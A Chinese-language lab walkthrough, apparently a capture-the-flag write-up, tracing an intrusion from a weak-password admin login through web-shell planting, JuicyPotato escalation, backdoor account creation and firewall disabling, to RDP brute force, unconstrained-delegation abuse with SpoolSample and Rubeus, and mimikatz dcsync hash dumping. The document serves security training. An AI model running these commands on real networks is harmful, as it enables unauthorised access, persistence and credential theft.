ZZZMCS
直接访问80端口,进入/admin登录界面,使用弱密码admin/admin123456进入到后台
来到模板管理随便编辑一个html
如下图添加
成功写入木马
连接蚁剑,在根目录拿到flag1
不过当前并不是system权限,好像直接通过蚁剑传马会超时,这里我开的http服务来下载
目标主机上有杀软,直接生成的cs木马会被直接杀掉,这里我用这个插件
使用插件juicypotato模块提升至system权限
其中5985扫描是开放的,接下来dumphash
走winrm进行添加用户,开放RDP等
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
net user hack Admin@123 /add
net localgroup Administrators hack /add
netsh firewall set opmode disable
远程登录后,刚好发现了360
查看到内网ip
使用stowaway添加代理
RDP Brute
fscan扫描结果如下
针对10.5.5.33进行全端口扫描,发现开放了3389
进行爆破登录,得到密码是admin@123456
这里有个前置条件,就是爆破RDP的时候,hydra似乎会走Kerberos认证,因此可能会出现以下错误
修改一下/etc/krb5.conf即可
[libdefaults]
default_realm = CYBERSTRIKE.LAB
dns_lookup_realm = false
dns_lookup_kdc = false
[realms]
CYBERSTRIKE.LAB = {
kdc = 10.5.5.66
admin_server = 10.5.5.66
}
[domain_realm]
.cyberstrike.lab = CYBERSTRIKE.LAB
cyberstrike.lab = CYBERSTRIKE.LAB
登录后在根目录拿到flag2
上传cs的定向木马,连接上线
可以通过cs的中转上线,利用svc提权到system
非约束委派
查询当前域内的非约束委派用户
AdFind.exe -b "DC=cyberstrikelab,DC=com" -f "(&(samAccountType=805306369)(userAccountControl:1.2.840.113556.1.4.803:=524288))" dn
也就是cyberweb用户是非约束委派,上传Rubeus监听来自域控的票据
利用打印机漏洞(SpoolSample)或类似攻击让域控主动连接非约束委派机器,从而生成并发送Kerberos票据给攻击者控制机器。
shell SpoolSample.exe DC CYBERWEB
用rubeus导入票据
shell Rubeus.exe ptt /ticket:<ticket>
mimikatz导出哈希
mimikatz.exe "lsadump::dcsync /domain:cyberstrikelab.com /user:cyberstrikelab\Administrator" "exit"
在根目录拿到flag3
